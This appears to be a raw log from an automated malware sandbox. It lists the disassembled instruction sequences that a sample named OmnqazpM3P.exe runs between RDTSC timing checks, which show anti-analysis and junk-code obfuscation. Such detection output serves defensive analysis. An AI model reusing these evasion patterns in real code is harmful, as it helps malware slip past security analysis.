Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0075 second address: 51B0079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0079 second address: 51B007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190D0D second address: 5190D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8D1541FE16h 0x0000000f push eax 0x00000010 jmp 00007F8D1541FE0Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 call 00007F8D1541FE14h 0x0000001c movzx ecx, bx 0x0000001f pop edx 0x00000020 mov al, E7h 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 jmp 00007F8D1541FE15h 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190D78 second address: 5190D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 mov dh, al 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190D85 second address: 5190D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190D8A second address: 5190D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190D9D second address: 5190DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51E002D second address: 51E0031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51E0031 second address: 51E0037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51E0037 second address: 51E008A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C3E8h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F8D1542224Dh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F8D15422253h 0x0000001d xor al, FFFFFFDEh 0x00000020 jmp 00007F8D15422259h 0x00000025 popfd 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51E008A second address: 51E00BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8D1541FE15h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51700E3 second address: 5170129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 46862BBAh 0x00000008 push edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F8D1542224Ch 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F8D15422250h 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8D15422257h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170129 second address: 5170158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8D1541FE0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170158 second address: 517015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517015E second address: 5170162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170162 second address: 5170166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170166 second address: 5170185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8D1541FE12h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5170185 second address: 517019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov eax, 46BEE019h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 517019C second address: 51701A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51701A0 second address: 51701B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51701D4 second address: 51701DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51701DA second address: 51701DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51701DE second address: 51701FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8D1541FE15h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A2F second address: 5190A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A33 second address: 5190A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A37 second address: 5190A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A3D second address: 5190A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F8D1541FE0Eh 0x00000010 mov ch, 1Fh 0x00000012 pop ebx 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A6F second address: 5190A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 movzx eax, dx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190A79 second address: 5190AB7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8D1541FE19h 0x00000008 or ecx, 17CABCF6h 0x0000000e jmp 00007F8D1541FE11h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190AB7 second address: 5190ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51906A2 second address: 51906B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1541FE0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51906B2 second address: 5190719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F8D15422256h 0x00000011 push eax 0x00000012 jmp 00007F8D1542224Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F8D15422256h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 call 00007F8D1542224Eh 0x00000025 pop ecx 0x00000026 mov cx, di 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190719 second address: 519072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8D1541FE10h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 519072F second address: 5190735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190735 second address: 5190739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5190602 second address: 519061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D15422254h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 519061A second address: 519061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E20 second address: 51D0E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E24 second address: 51D0E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E2A second address: 51D0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E30 second address: 51D0E62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f mov di, F500h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8D1541FE12h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E62 second address: 51D0E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E74 second address: 51D0E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0E78 second address: 51D0EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 pushfd 0x00000011 jmp 00007F8D15422255h 0x00000016 and ax, 8716h 0x0000001b jmp 00007F8D15422251h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0EB6 second address: 51D0F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8D1541FE17h 0x00000009 jmp 00007F8D1541FE13h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F8D1541FE18h 0x00000015 adc si, 2CC8h 0x0000001a jmp 00007F8D1541FE0Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F8D1541FE15h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0334 second address: 51B0338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0338 second address: 51B033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B033C second address: 51B0342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0342 second address: 51B0348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0348 second address: 51B034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B034C second address: 51B035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cx, 629Bh 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B035F second address: 51B037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 91h 0x00000005 mov ah, B4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8D1542224Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B037B second address: 51B03E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F8D1541FE16h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 call 00007F8D1541FE13h 0x0000001d call 00007F8D1541FE18h 0x00000022 pop eax 0x00000023 pop ebx 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov edi, 5A9C241Eh 0x00000031 mov di, 642Ah 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B03E9 second address: 51B03EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B03EF second address: 51B03F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51A0E6C second address: 51A0EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8D1542224Fh 0x00000009 sbb ax, 222Eh 0x0000000e jmp 00007F8D15422259h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F8D1542224Ah 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edi, eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51A0EB6 second address: 51A0F37 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8D1541FE18h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F8D1541FE0Bh 0x00000010 sbb esi, 0A2F2D9Eh 0x00000016 jmp 00007F8D1541FE19h 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push edi 0x00000022 pop esi 0x00000023 pushfd 0x00000024 jmp 00007F8D1541FE0Fh 0x00000029 or esi, 22AAF7AEh 0x0000002f jmp 00007F8D1541FE19h 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B01D9 second address: 51B01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 8Eh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B01E0 second address: 51B01E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B01E6 second address: 51B01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B01EA second address: 51B01EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B01EE second address: 51B0210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8D15422256h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51B0210 second address: 51B0222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1541FE0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D06BC second address: 51D06C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D06C0 second address: 51D06C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D06C4 second address: 51D06CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D06CA second address: 51D0711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F8D1541FE14h 0x00000010 push eax 0x00000011 pop edi 0x00000012 pop eax 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8D1541FE14h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0711 second address: 51D0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8D1542224Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0723 second address: 51D0727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0727 second address: 51D07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F8D1542224Ch 0x0000000e mov dword ptr [esp], ecx 0x00000011 jmp 00007F8D15422250h 0x00000016 mov eax, dword ptr [76FA65FCh] 0x0000001b jmp 00007F8D15422250h 0x00000020 test eax, eax 0x00000022 jmp 00007F8D15422250h 0x00000027 je 00007F8D87175436h 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F8D1542224Eh 0x00000034 sbb al, FFFFFFA8h 0x00000037 jmp 00007F8D1542224Bh 0x0000003c popfd 0x0000003d mov cx, 2A9Fh 0x00000041 popad 0x00000042 mov ecx, eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 mov edi, ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D07A7 second address: 51D0827 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8D1541FE0Ah 0x00000008 or esi, 3AF44608h 0x0000000e jmp 00007F8D1541FE0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F8D1541FE18h 0x0000001c add ecx, 1C2B6868h 0x00000022 jmp 00007F8D1541FE0Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xor eax, dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d mov bx, F944h 0x00000031 popad 0x00000032 and ecx, 1Fh 0x00000035 pushad 0x00000036 mov cx, dx 0x00000039 mov eax, edi 0x0000003b popad 0x0000003c ror eax, cl 0x0000003e jmp 00007F8D1541FE17h 0x00000043 leave 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0827 second address: 51D082B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D082B second address: 51D0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0831 second address: 51D0862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1542224Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00812014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F8D19E22A98h 0x00000024 push FFFFFFFEh 0x00000026 pushad 0x00000027 mov cl, 2Bh 0x00000029 mov ah, dl 0x0000002b popad 0x0000002c pop eax 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 pop edx 0x00000031 call 00007F8D1542224Ah 0x00000036 pop esi 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov ebx, 38025A64h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D0862 second address: 51D08A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ret 0x00000008 nop 0x00000009 push eax 0x0000000a call 00007F8D19E20679h 0x0000000f mov edi, edi 0x00000011 jmp 00007F8D1541FE0Fh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F8D1541FE16h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8D1541FE0Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D08A4 second address: 51D08B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 51D08B9 second address: 51D08F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D1541FE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8D1541FE0Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8D1541FE17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180025 second address: 5180063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8D15422251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8D15422251h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F8D1542224Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180063 second address: 5180067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	RDTSC instruction interceptor: First address: 5180067 second address: 518006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
